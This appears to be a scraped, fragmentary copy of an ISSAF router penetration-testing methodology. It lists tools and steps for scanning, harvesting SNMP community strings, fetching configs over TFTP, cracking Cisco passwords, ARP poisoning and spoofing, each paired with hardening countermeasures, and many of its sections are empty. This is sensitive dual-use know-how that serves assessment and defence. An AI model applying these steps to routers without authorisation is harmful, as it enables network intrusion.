Beruflich Dokumente
Kultur Dokumente
Description
Routed Issues
Routing Issues
Routing devices are used to direct network traffic and any one router can be used
to manipulate network traffic
Objective
To assess end-to-end router security with target knowledge and/or without target
knowledge
To
provide
single
point
reference
for
router
security
Technical Requirements
assessment
and
Expected Results
Mis-configuration on router
Password cracking
SNMP insecurities
TFTP insecurities
Methodology / Process
Router Identification
o
Port scanning
OS detection + Versioning
Mis-configurations
VTY/TTY Connections
Exec timeout
HTTP Connections
TFTP
Finger
Password Security
IP Spoofing
ICMP Redirects
ARP Attacks
IRDP
IGRP
EIGRP (Discovery)
Analysis/Conclusion/Observation
Countermeasures
Do not register the router in DNS
Tool[s]
Dig, nslookup, host
Further Reading[s]
Remarks
Mostly router entries are never made in DNS server
Service
Telnet
HTTP
SNMP
Protocol
TCP
TCP
UDP
Countermeasures
Tool[s]
Nmap
Further Reading[s]
The following sections of the ISSAF methodology document: portscanning, operating
system scanning, banner grabbing
Remarks
Process
Examples/Results
# nmap sO <router ip address>
Analysis/Conclusion/Observation
Countermeasures
Only allow the necessary protocols
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Examples/Results
# rat <router-configuration-file>
Analysis/Conclusion/Observation
The rat tool analyses the configuration file.
Countermeasures
Tool[s]
Router Auditing Tool (http://www.cisecurity.org) for Cisco routers
Further Reading[s]
http://www.cisecurity.org
http://www.nsa.gov/notices/notic00004.cfm?Address=/snac/routers/cisco_scg-1.1b.pdf
Remarks
Having the IP address of the router if this is going to be tested from the internet
The minimum expected result is a login prompt, if the router is not secured, terminal access
will be possible.
Routers are configured for many different modes. In case of Cisco one mode is user
mode. While accessing the router through VTY/TTY connections, first router prompts for
password, if its been configured, which is by default not and he/she logged into user mode
on the router.
In user mode router displays hostname followed by the greater than symbol. Example of
user mode access:
TargetRouter>
Collect the password hash and decrypt it. CAIN can be used to decrypt it.
Commands in user mode are very limited. Enable mode is also known as privileged mode.
To access enable mode type followings:
TargetRouter>enable
If password is not configured and you get following prompt:
TargetRouter#
You have fully compromised the router.
If the router prompts you for the password, perform password attacks.
Analysis/Conclusion/Observation
If telnet or rlogin is used:
Countermeasures
Dont allow telnet on internet interfaces of routers
Configure a console password to authenticate users for user mode access by entering the
following commands:
TargetRouter#configure terminal
2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)
Date: 11/16/2016
Page 10 of 40
Some router has local user authentication database, it can be used to authenticate
users who connect directly to the console port of a router. An example of Cisco Router
using local user authentication is as follows:
!
username Miguel privilege 15 password 0 romancer
username Dieter privilege 12 password 0 Pr0mptM@n
username Rama privilege 8 password 0 rEc0n
!
line con 0
login local
transport input none
!
It is better to use AAA server for all the authentication requests. All the authentication
requests will be send to the AAA server in encrypted form plus the logs of the session will
be maintained.
Tool[s]
CAIN
http://www.oxid.it/cain.html
telnet, ssh, Hyper Terminal
Further Reading[s]
Remarks
Tool[s]
Internet Explorer
Router Remote Management Tool (e.g. Cisco Secure Policy Manager for Cisco)
Further Reading[s]
Remarks
with an old version of SNMP implemented. Read and write accesses are available to
routers. Some default strings are Public for (read access) and Private (read/write access).
Cisco default string is ILMI
SNMP v1 is insecure in its nature. Tool like snmpsniff can be used to gather clear text
community string.
Pre-requisite[s]
Port 161 UDP is listening and service is accessible from attack point
Device IP Address
SNMP communitystring
Process
Outside to Inside approach
Identify communitystring
o
If the private community string has been found, try to retrieve the router configuration
file through tftp (setup a tftp server on your system)
Inside Approach
If the private community string has been found, try to retrieve the router configuration
file through tftp (setup a tftp server on your system)
Examples/Results
snmpwalk m all c <community string> <Device ip address> | more
Analysis/Conclusion/Observation
Countermeasures
If the service is not absolutely required, disable it.
Filter SNMP (TCP/UDP 161, 162) traffic at border router. Allow trusted subnets to poll or
2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)
Date: 11/16/2016
Page 13 of 40
Consider Community strings as important as passwords and apply the same best
practices. (secret = secre?t)
Try using SNMP v3 with message authentication and PDU encryption. If not possible
use SNMP V2, it uses MD5 authentication
TFTP server should be implemented on same protected network segment as the device
using it.
Remarks
No Plan.
Login: root
Name: Mr. Root
Directory: /root
Shell: /bin/sh
Last login Wed Jan 30 09:43 2002 (CET) on console
No Plan.
Analysis/Conclusion/Observation
Finger daemon is running on target system
root user is logged in into the system
Countermeasures
Strongly recommended to block the port on external interface of Router/Firewall.
Process
Use a cdp sniffer to find information of the Cisco Discovery Protocol.
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Phenolit CDP tool
Further Reading[s]
2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)
Date: 11/16/2016
Page 19 of 40
Remarks
A.1.2.10
Description
Refer Password Security Assessment Section of ISSAF.
Router passwords are stored in the local configuration file. These password should be
encrypted using XOR, MD5. Other passwords are in the file as well. (HTTP, SNMP strings)
Configuration/Configuration files passing through emails, TFTP, VMPS are vulnerable to
sniffing attacks. Weekly encrypted password can be easily cracked using tool like leptons
crack or CAIN. MD5 protected passwords are vulnerable to dictionary attacks.
Pre-requisite[s]
Sniffer
Assessment machine
Process
Sniff data for testing configuration files passing across network in clear text via
email/NetBIOS/TFTP etc
Decrypt encrypted passwords, many time you will find week encryption (CISCO type 7
passwords)
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Configure enable secret passwords for enable password encryption (for Cisco routers)
Configure service password-encryption for other passwords
Tool[s]
Leptons crack
CAIN
Sniffer
Remarks
A.1.2.11
Description
The path of packet (Outbound and return) is defined in packet itself. It is of two types 1.
Loose source routing and 2. Strict source routing.
Loose source routing: Some hops (routing device) in the path are defined and rest of host
as usual.
Strict source routing: Every hop (routing device) in the path is defined, from start to end.
Pre-requisite[s]
Packet crafter
Examples/Results
Use the ping utility with the source routing options (on windows: ping j <hosts> for loose
and ping k <hosts> for strict source routing.
Analysis/Conclusion/Observation
Countermeasures
For strict source routing: no ip source-route
For loose source routing: no ip redirects
Tool[s]
ping
Netcat
VSR
Further Reading[s]
Remarks
A.1.2.12
TEST IP SPOOFING
Description
By using IP spoofing, an attacker can circumvent IP access control lists (mostly configured
on routers) by assuming someones identity.
There are multiple techniques available for IP spoofing, which are as follows:
Source Routing
On the router, a packet with the internal address is originating from external interface is
considered spoofed IP packet
ACLs are used on the router, if no access control lists are used then this test has little use
since it would definitely be possible to perform IP spoofing then.
Pre-requisite[s]
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Create an access control list on the router which denies packets with internal IP
address originating from external interface of router.
Limitation
o
Tool[s]
Further Reading[s]
Remarks
A.1.2.13
A.1.2.14
Description
ICMP Redirects allows an attacker to manipulate host routing tables. An ICMP redirect
can specify a new gateway for specific networks.
Pre-requisite[s]
Icmp_redir
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
No icmp-redirects is defined in the router enable mode.
Tool[s]
icmp_redir
Further Reading[s]
http://www.insecure.org/sploits/arp.games.html
Remarks
A.1.2.15
Description
In switched networks packets are switched based on MAC addresses and every host on
different network is considered private. Gratuitous ARP is used by host to announce their
IP address. It's a broadcast packet like an ARP request. Manipulation of ARP cache results
into man-in-the-middle attack. Test if ARP spoofing is possible against this router.
Pre-requisite[s]
ARP cache poisoning tool : Ettercap or Dsniff1.3
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Hard code critical ARP entries in the router and gateway/server(s)
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Process
Hash gathering and password cracking tool in case hashing by using MD5 is used. Both the
routers use the same secret key that is being used for generating the hash & appended to
the message. This is also man in the middle attack.
Dictionary attack along with brute force attack is used for cracking the password so that the
message can be read & routing updates can be modified.
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
RIP version 1.0 is not suitable as per security point of view. RIP ver 2.0 Routing updates
with clear authentication can be easily broken into. Hence MD5 authentication should be
used & the shared secret should be strong & with a definite lifetime so that cannot be
broken easily. Configuration is as follows :
Central(config)# key chain asdf
Central(config-keychain)# key 1
Central(config-keychain-key)# key-string asdaaajas-a431
Central(config-keychain-key)# exit
2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)
Date: 11/16/2016
Page 30 of 40
Central(config-keychain)# key 2
Central(config-keychain-key)# key-string khfhgdsdj-16allsd-32hsa
Central(config-keychain-key)# end
Tool[s]
L0pht crack, John the Ripper
Further Reading[s]
Routing & Switching by Jeoff Doyle Part I
Remarks
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
It can be protected by anti spoofing filters and TCP MD5 password protection
Tool[s]
Further Reading[s]
Remarks
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Need to make some registry entries in the system running these protocols depending upon
the OS
Eg. Win 98/ME
HKEY_LOCAL_MACHINESystemCurrentControlSetServicesClassNetTrans00n (Where
"000n" is your Tcp/IP protocol. It contains TCP/IP assigned to the "DriverDesc" Value)
PerformRouterDiscovery="0" (DWORD value)
Windows 2000:
HKLMSYSTEMCurrentControlSetServicesTcpipParametersInterfacesinterface
PerformRouterDiscovery="0" (REG_DWORD, range 0,1,2, 0=disabled, 1=enabled,
2=enable only if DHCPsends the router discover option)
Tool[s]
Further Reading[s]
Remarks
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Malformed packets
Packet floods
Network based denial of service attacks can be divided into categories: 1. Malformed
packets attacks and 2. Packet flood attacks
Malformed packet attack Attacker sends single packet of small stream of packets to
target that formed in a way not anticipated by the developers of target machine. The
system is not designed to handle some strangely formed packets and that may result
into crashing the system for e.g., ping-of-depth
Packet Flood attacks These attacks occurs when the attacker sends to much packets
to the destination & which the destination cannot process for e.g syn attacks.
Also packets filtered by Access control lists are generally not detected by a Network
Intrusion Detection System. It is recommended to log it.
o
A.2.10
Directed broadcasts are used extensively in denial of service attacks including smurf. It
is recommended that IP directed broadcasts are dropped by router to prevent being an
agent for Distributed Denial of Service attacks
2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)
Date: 11/16/2016
Page 39 of 40
A.2.11
Limit ICMP
Several Denial of Service attacks use the ICMP protocol. The types of ICMP messages
allowed should be limited. At a minimum, in order to allow for Path MTU discovery
(PMTU), consider permitting packet-too-big messages. The other types of ICMP
messages can be disabled
A.2.12
A.2.13
Reflexive access list to prevent connection hijacking on
internet router
A.2.14
Use CBAC
Use CBAC on intranet and extranet routers where u do not have dedicated firewall
(CBAC intelligently filters TCP and UDP packets based on application layer protocol
information)
A.2.15
A.2.16
Authentication proxy and AAA in case you do not have separate proxy server.